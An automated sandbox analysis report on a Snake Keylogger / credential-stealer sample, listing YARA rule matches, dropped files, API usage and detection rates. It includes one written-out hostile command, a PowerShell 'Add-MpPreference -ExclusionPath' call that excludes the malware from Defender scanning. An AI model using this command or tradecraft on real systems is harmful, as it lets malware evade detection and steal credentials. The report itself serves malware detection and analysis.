                Source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: ckHregxJIq.exe, Form1.csLarge array initialization: : array initializer size 719153
                Source: ckHregxJIq.exe, firstStart.csLarge array initialization: firstStart: array initializer size 4390
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A2D4301_2_06A2D430
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A25ABC1_2_06A25ABC
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A2D9261_2_06A2D926
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5B7781_2_06A5B778
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A532221_2_06A53222
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A548F81_2_06A548F8
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5E7881_2_06A5E788
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5E7981_2_06A5E798
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5E3601_2_06A5E360
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5E3431_2_06A5E343
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A56E601_2_06A56E60
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A57C001_2_06A57C00
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A57BF01_2_06A57BF0
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5EBD01_2_06A5EBD0
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A579081_2_06A57908
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A579181_2_06A57918
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_07405E601_2_07405E60
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_074007C81_2_074007C8
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_074003901_2_07400390
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_0742332C1_2_0742332C
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2D27814_2_02F2D278
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2536214_2_02F25362
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2A08814_2_02F2A088
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2C14614_2_02F2C146
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2711814_2_02F27118
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2C73814_2_02F2C738
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2C46814_2_02F2C468
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2CA0814_2_02F2CA08
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F269A014_2_02F269A0
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2E98814_2_02F2E988
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2CFAA14_2_02F2CFAA
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2CCD814_2_02F2CCD8
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2F63014_2_02F2F630
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F23A9914_2_02F23A99
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2FA8814_2_02F2FA88
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F229E014_2_02F229E0
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F2E97A14_2_02F2E97A
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 14_2_02F23E0914_2_02F23E09
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2B77815_2_06F2B778
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2322215_2_06F23222
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F248FA15_2_06F248FA
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2E79815_2_06F2E798
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2E78815_2_06F2E788
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2E36015_2_06F2E360
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2E35115_2_06F2E351
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F26E6015_2_06F26E60
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F27C0015_2_06F27C00
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F27BF015_2_06F27BF0
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2EBD015_2_06F2EBD0
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2791815_2_06F27918
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F2790815_2_06F27908
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_0869D91915_2_0869D919
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_08695ABC15_2_08695ABC
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_0869D42715_2_0869D427
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_0869D43015_2_0869D430
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EC14619_2_015EC146
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EA08819_2_015EA088
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E536219_2_015E5362
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015ED27819_2_015ED278
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EC46819_2_015EC468
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EC73819_2_015EC738
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EE98819_2_015EE988
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E69A019_2_015E69A0
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E3B9519_2_015E3B95
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015ECA0819_2_015ECA08
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015ECCD819_2_015ECCD8
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E6FC819_2_015E6FC8
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015ECFA919_2_015ECFA9
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E3E0919_2_015E3E09
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EF63119_2_015EF631
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EE97A19_2_015EE97A
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E29EC19_2_015E29EC
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015EFA8819_2_015EFA88
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 19_2_015E3AA119_2_015E3AA1
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000000.1269055635.00000000002A0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewDGx.exe4 vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1313982240.00000000068C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1316854630.0000000007880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.0000000003638000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1299290995.0000000002631000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1299290995.00000000028A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1295846767.0000000000A5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 00000001.00000002.1302654676.000000000367C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 0000000E.00000002.3724190337.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs ckHregxJIq.exe
                Source: ckHregxJIq.exe, 0000000E.00000002.3723375088.000000000043D000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs ckHregxJIq.exe
                Source: ckHregxJIq.exeBinary or memory string: OriginalFilenamewDGx.exe4 vs ckHregxJIq.exe
                Source: ckHregxJIq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 15.2.aFAsiNcQRJEVeL.exe.4169990.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.ckHregxJIq.exe.41d5678.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 15.2.aFAsiNcQRJEVeL.exe.3969970.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.ckHregxJIq.exe.40c6e38.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.ckHregxJIq.exe.414e258.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000F.00000002.1348460508.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000E.00000002.3723375088.000000000042C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000F.00000002.1348460508.0000000003968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.1302654676.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ckHregxJIq.exe PID: 7868, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ckHregxJIq.exe PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: aFAsiNcQRJEVeL.exe PID: 1292, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: ckHregxJIq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: aFAsiNcQRJEVeL.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.ckHregxJIq.exe.41d5678.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@3/3
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5008:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5548:120:WilError_03
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD0A2.tmpJump to behavior
                Source: ckHregxJIq.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ckHregxJIq.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003373000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000334E000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003340000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.0000000003330000.00000004.00000800.00020000.00000000.sdmp, ckHregxJIq.exe, 0000000E.00000002.3727115213.000000000337F000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.0000000003202000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, aFAsiNcQRJEVeL.exe, 00000013.00000002.3728205346.000000000320F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ckHregxJIq.exeReversingLabs: Detection: 81%
                Source: ckHregxJIq.exeVirustotal: Detection: 70%
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile read: C:\Users\user\Desktop\ckHregxJIq.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\ckHregxJIq.exe "C:\Users\user\Desktop\ckHregxJIq.exe"
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ckHregxJIq.exe"
